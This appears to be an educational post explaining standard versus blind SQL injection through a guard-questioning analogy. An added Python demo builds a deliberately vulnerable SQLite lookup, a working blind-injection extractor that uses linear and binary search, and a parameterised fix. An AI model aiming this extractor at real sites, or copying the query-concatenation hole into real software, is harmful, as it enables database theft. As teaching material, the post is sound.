 
    Many in InfoSec get confused about the difference between standard and blind
    SQL injection. Here’s a simple way to think about it. In both cases you
    are asking questions of an entity in hopes of getting back valuable
    information; the difference between standard and blind is the kind of
    question you’re allowed to ask, and how much of the answer comes back.
  
Standard SQL Injection
    So imagine you’re in some sort of fantasy setting and you come upon a room
    guarded by a soldier. You’re told that you must learn the entire contents of
    the room he’s protecting, but you’re not allowed to go inside to see it
    directly. You have to figure it out just by asking the guard questions.
  
    To start with, you ask, “Tell me the Spanish word for the thing closest to
    the door.” The guard answers back, “I don’t know the Spanish word for ‘pile
    of gold’.” You then ask him the Spanish word for the most expensive thing in
    the room, and he responds, “I don’t know the Spanish word for ‘King’s
    Crown’.”
  
    This is something like standard (more precisely, error-based) SQL injection:
    you ask the database to perform some operation on the thing you want, the
    operation fails, and the error message it sends back includes the value you
    were after. Think of a type-conversion error that quotes the string it
    couldn’t convert. This is the all-too-common ‘barf the database error on
    the screen’ scenario.
  
But that’s old school.
    After a couple of these the guard figures out what you’re doing, and he
    stops giving you valuable information. He thinks he’s smart, so he decides
    that instead of giving long answers that could have information in them, he
    will now only answer yes or no to any question you ask. This is a lot like
    a developer adding a custom error page to his web app for when the database
    barfs. If the query succeeds and matches something you get your standard
    results; if not (for any reason, including a syntax error), you get the
    generic error page with no goodies in it.
  
Blind SQL Injection
    So now you just have to come up with a bunch of creative questions that will
    reveal information from nothing but yes/no answers. This is blind
    injection, and it takes much more time, since each question leaks at most
    one bit, but as long as you’re allowed to keep asking it’s just a matter of
    sending enough requests.
  
“Does the item by the door start with the letter ‘a’?”
“No.”
“Does the item by the door start with the letter ‘b’?”
“No.”
    You then go down the list until you hit ‘g’, for gold. Now you move to the
    second letter. And so on.
  
    In the database world this sounds something like, “Does the first table in
    the database have a first letter higher than ‘a’?” If so, the injected
    condition is true, your query goes through, and you get whatever it was
    you were supposed to get from that page. If not, you get the standardized
    error page.
  
    So, error equals no, and regular result equals yes. So you keep asking: “Is
    it higher than ‘b’?” And so on. (Because ‘higher than’ questions split the
    remaining alphabet in two, you can binary-search each character in about
    seven requests instead of walking through every letter one at a time.)
  
    It takes a while (and a lot of requests and responses), but eventually you
    build out the complete answer. That’s Blind SQL Injection.
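The whole exchange, as an added example that is not part of the original post: a toy application backed by an in-memory SQLite database. Its table names (gold, users), the function names (vulnerable_lookup, safe_lookup, BlindExtractor) and the generic error page are all made up for this illustration. The app concatenates the request value into its query and hides every database error behind one generic page, which is exactly the yes/no guard described above. The attacker side then spells out the first table name two ways: the letter-by-letter questioning from the story, and the “is it higher than …?” binary search, counting the requests each one costs. A parameterised version of the same lookup is included to show that the oracle gets nothing once the input can no longer change the query’s structure.

```python
"""Boolean-based blind SQL injection against a toy SQLite-backed 'app'.

Constructed example: table names, function names and the error page are
hypothetical. The app concatenates user input into its query (the bug),
turns every database error into one generic page, and shows the product
page only when the query matched a row. Page-or-error is the guard's yes/no.
"""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE gold  (id INTEGER PRIMARY KEY, weight_kg REAL);
    CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT);
    INSERT INTO gold  VALUES (1, 12.5);
    INSERT INTO users VALUES (1, 'king', 'not-a-real-hash');
""")

ERROR_PAGE = "Sorry, something went wrong."


def vulnerable_lookup(product_id: str) -> str:
    """The app. product_id comes straight from the request (hypothetical)."""
    sql = "SELECT weight_kg FROM gold WHERE id = " + product_id   # the bug
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return ERROR_PAGE            # custom error page: no database 'barf'
    if row is None:
        return ERROR_PAGE            # condition false: the same generic page
    return f"Product: gold, {row[0]} kg"


def safe_lookup(product_id: str) -> str:
    """Same app with a parameterised query: input is data, never SQL."""
    try:
        row = conn.execute("SELECT weight_kg FROM gold WHERE id = ?",
                           (product_id,)).fetchone()
    except sqlite3.Error:
        return ERROR_PAGE
    return ERROR_PAGE if row is None else f"Product: gold, {row[0]} kg"


# What we want the guard to spell out: the alphabetically first table name.
TARGET = "(SELECT name FROM sqlite_master WHERE type='table' ORDER BY name LIMIT 1)"


class BlindExtractor:
    """Turns a page-or-error oracle into characters, counting requests."""

    def __init__(self, page):
        self.page = page          # the app function standing in for HTTP
        self.requests = 0

    def ask(self, condition: str) -> bool:
        """One yes/no question: 'id = 1 AND (cond)' keeps the row only when
        cond is true; a false cond, or any error, yields the generic page."""
        self.requests += 1
        return self.page(f"1 AND ({condition})") != ERROR_PAGE

    def length(self, hi: int = 64) -> int:
        """Binary search for length(TARGET) in [0, hi]."""
        lo = 0
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask(f"length({TARGET}) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def char_linear(self, i: int) -> str:
        """'Does it start with a? with b? ...': one question per candidate."""
        for code in range(32, 127):
            if self.ask(f"unicode(substr({TARGET}, {i}, 1)) = {code}"):
                return chr(code)
        raise ValueError("character outside printable ASCII")

    def char_binary(self, i: int) -> str:
        """'Is it higher than ...?' as a binary search over printable ASCII:
        at most seven questions per character."""
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask(f"unicode(substr({TARGET}, {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return chr(lo)

    def extract(self, binary: bool = True) -> str:
        n = self.length()
        pick = self.char_binary if binary else self.char_linear
        return "".join(pick(i) for i in range(1, n + 1))


def demo(binary: bool = True, page=vulnerable_lookup):
    """Return (extracted table name, number of requests it took)."""
    ex = BlindExtractor(page)
    return ex.extract(binary), ex.requests


if __name__ == "__main__":
    print("linear :", demo(binary=False))
    print("binary :", demo(binary=True))
    print("patched:", demo(page=safe_lookup))   # nothing comes back
```

Against the vulnerable lookup both strategies recover the name “gold”; the linear walk needs a few hundred requests while the binary search needs a few dozen, which is the “it takes a while, but eventually you build out the complete answer” point in numbers. Against safe_lookup the injected condition is just a string that matches no id, every question is answered “no”, and the extractor comes back with an empty string.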
  
    TL;DR: Standard SQL Injection works by asking questions that trick the app
    into returning answers inside an error message. Blind SQL Injection works
    by asking questions that can only have a yes or no answer, and reading that
    answer from the app’s behaviour (normal page vs. error page). From there
    you simply iterate through all your options until the yes and no responses
    build out your desired results.
  
